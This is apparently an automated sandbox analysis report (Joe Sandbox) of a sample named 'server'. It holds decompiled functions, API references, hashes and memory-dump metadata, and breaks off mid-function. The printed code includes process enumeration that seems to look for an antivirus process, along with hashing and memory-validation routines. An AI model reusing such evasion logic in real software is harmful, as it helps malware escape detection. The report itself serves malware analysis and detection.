0x047e1ea3
0x047e1eb9
0x047e1ea5
0x047e1ea5
0x047e1eb2
0x047e1eb2
0x047e1ebd
0x047e1ebf
0x047e1ec9
0x047e1ece
0x047e1ece
0x047e1ec9
0x047e1ed5
0x047e1eeb
0x047e1ed7
0x047e1ed7
0x047e1ee4
0x047e1ee4
0x047e1eef
0x047e1ef1
0x047e1efb
0x047e1f00
0x047e1f00
0x047e1efb
0x047e1f07
0x047e1f1d
0x047e1f09
0x047e1f09
0x047e1f16
0x047e1f16
0x047e1f21
0x047e1f34
0x047e1f34
0x00000000
0x047e1f23
0x047e1f23
0x047e1f2d
0x00000000
0x047e1f3e
0x047e1f3e
0x047e1f40
0x047e1f56
0x047e1f42
0x047e1f42
0x047e1f4f
0x047e1f4f
0x047e1f5a
0x047e1f5c
0x047e1f5f
0x047e1f60
0x047e1f67
0x047e1f69
0x047e1f6a
0x047e1f6a
0x047e1f67
0x047e1f71
0x047e1f87
0x047e1f73
0x047e1f73
0x047e1f80
0x047e1f80
0x047e1f8b
0x047e1f99
0x047e1fa3
0x047e1fa3
0x047e1fab
0x047e1fc1
0x047e1fad
0x047e1fad
0x047e1fba
0x047e1fba
0x047e1fc5
0x047e1fd8
0x047e1fd8
0x047e1fdd
0x047e1fe3
0x00000000
0x047e1fc7
0x047e1fca
0x047e1fcf
0x047e1fd6
0x047e1fe8
0x047e1fea
0x047e2000
0x047e1fec
0x047e1fec
0x047e1ff9
0x047e1ff9
0x047e2004
0x047e2010
0x047e2015
0x047e2015
0x047e2006
0x047e2009
0x047e2009
0x047e2023
0x047e2028
0x047e202e
0x00000000
0x047e2031
0x00000000
0x047e1fd6
0x047e1fc5
0x047e1f2d
0x047e1f21

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E2F
StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E61
StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E93
StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EC5
StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EF7
StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1F29
HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E2028
HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E203C

Strings

Uet, xrefs: 047E2028, 047E203C

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uet
API String ID: 3298025750-2766386878
Opcode ID: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
Instruction ID: 8e027201e89a8e8372e9d239eb09454b7d243282f3510545f1602958bcd99cf6
Opcode Fuzzy Hash: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
Instruction Fuzzy Hash: 05813C70B10104ABD711EBB7DD89DBB77BDEB4C7047A48B25A501DB344EA39F9448760

Uniqueness

Uniqueness Score: -1.00%

Function 047E30D5 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E047E30D5() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x47ea348; // 0xc3d5a8
						_t2 = _t9 + 0x47ebe88; // 0x73617661
						_push( &_v264);
						if( *0x47ea12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x047e30e0
0x047e30ea
0x047e30ee
0x047e30f8
0x047e3129
0x047e30ff
0x047e3104
0x047e3111
0x047e311a
0x047e3131
0x047e311c
0x047e3124
0x00000000
0x047e3124
0x047e3132
0x047e3133
0x00000000
0x047e3133
0x00000000
0x047e312d
0x047e3139
0x047e313e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E30E5
Process32First.KERNEL32(00000000,?), ref: 047E30F8
Process32Next.KERNEL32(00000000,?), ref: 047E3124
CloseHandle.KERNEL32(00000000), ref: 047E3133

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
Instruction ID: e84ad497415cc88d5cc78291cb7ccfbc555e8ac827060fad950c62b9be5009cc
Opcode Fuzzy Hash: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
Instruction Fuzzy Hash: E2F0BB722005549BD720A677DC49EFB37ACDFCD314F010365FE45C7201EA34E95586A1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D68() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401d69
0x00401d77
0x00401d7d
0x00401d84
0x00401ddb
0x00401ddb
0x00401d86
0x00401d8e
0x00401d9b
0x00401d9b
0x00401dd7
0x00401dd9
0x00000000
0x00000000
0x00000000
0x00401d90
0x00401d97
0x00401d9d
0x00401d9d
0x00401da2
0x00401db0
0x00401db5
0x00401dbb
0x00401dc1
0x00401dc8
0x00401dca
0x00401dca
0x00401dd4
0x00401d99
0x00401d99
0x00000000
0x00401d99
0x00401d97

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
GetVersion.KERNEL32 ref: 00401D86
GetCurrentProcessId.KERNEL32 ref: 00401DA2
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 047E16DF Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E047E16DF(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x047e16e2
0x047e16ed
0x047e16f0
0x047e16f3
0x047e16f4
0x047e1712
0x047e1714
0x047e1717
0x047e171a
0x047e171a
0x047e171d
0x047e171d
0x047e1720
0x047e1720
0x047e1723
0x047e1723
0x047e1740
0x047e1743
0x047e1759
0x047e175c
0x047e1776
0x047e1779
0x047e178f
0x047e1792
0x047e1794
0x047e17ac
0x047e17af
0x047e17b2
0x047e17ca
0x047e17cd
0x047e17e7
0x047e17ea
0x047e1800
0x047e1803
0x047e1805
0x047e181d
0x047e1822
0x047e1825
0x047e183b
0x047e183e
0x047e1858
0x047e185b
0x047e1871
0x047e1874
0x047e1876
0x047e1891
0x047e1894
0x047e18ab
0x047e18ae
0x047e18b2
0x047e18cb
0x047e18ce
0x047e18d0
0x047e18d3
0x047e18ee
0x047e18f1
0x047e190a
0x047e190d
0x047e191d
0x047e1920
0x047e1938
0x047e193b
0x047e1955
0x047e1958
0x047e1970
0x047e1973
0x047e1989
0x047e198c
0x047e19a4
0x047e19a7
0x047e19bf
0x047e19c2
0x047e19dc
0x047e19df
0x047e19f5
0x047e19f8
0x047e1a10
0x047e1a13
0x047e1a2d
0x047e1a30
0x047e1a48
0x047e1a4b
0x047e1a61
0x047e1a64
0x047e1a7c
0x047e1a7f
0x047e1a97
0x047e1a9a
0x047e1aac
0x047e1aaf
0x047e1ac1
0x047e1ac4
0x047e1ad6
0x047e1ad9
0x047e1add
0x047e1aed
0x047e1af0
0x047e1afe
0x047e1b01
0x047e1b13
0x047e1b16
0x047e1b2a
0x047e1b2d
0x047e1b2f
0x047e1b3f
0x047e1b42
0x047e1b54
0x047e1b57
0x047e1b65
0x047e1b68
0x047e1b7a
0x047e1b7d
0x047e1b81
0x047e1b91
0x047e1b94
0x047e1ba6
0x047e1ba9
0x047e1bb7
0x047e1bba
0x047e1bcc
0x047e1bcf
0x047e1be1
0x047e1be4
0x047e1bf8
0x047e1bfb
0x047e1c0f
0x047e1c12
0x047e1c26
0x047e1c29
0x047e1c3d
0x047e1c40
0x047e1c54
0x047e1c57
0x047e1c6b
0x047e1c70
0x047e1c82
0x047e1c85
0x047e1c99
0x047e1c9c
0x047e1cb0
0x047e1cb3
0x047e1cc9
0x047e1ccc
0x047e1ce0
0x047e1ce3
0x047e1cf5
0x047e1cf8
0x047e1d0c
0x047e1d0f
0x047e1d23
0x047e1d26
0x047e1d3a
0x047e1d43
0x047e1d46
0x047e1d4f
0x047e1d58
0x047e1d60
0x047e1d68
0x047e1d72
0x047e1d87

APIs

memset.NTDLL ref: 047E1D7B

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction ID: 1cd9242d13c31591cae5bd88b4276de093ee30bb62b7ff158e5094217d8de185
Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction Fuzzy Hash: C922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 047E8551 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E8551(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x47ea380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x47ea3c8 = 1;
										__eflags =  *0x47ea3c8;
										if( *0x47ea3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x47ea380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x47ea3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x47ea380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x47ea388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x47ea384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
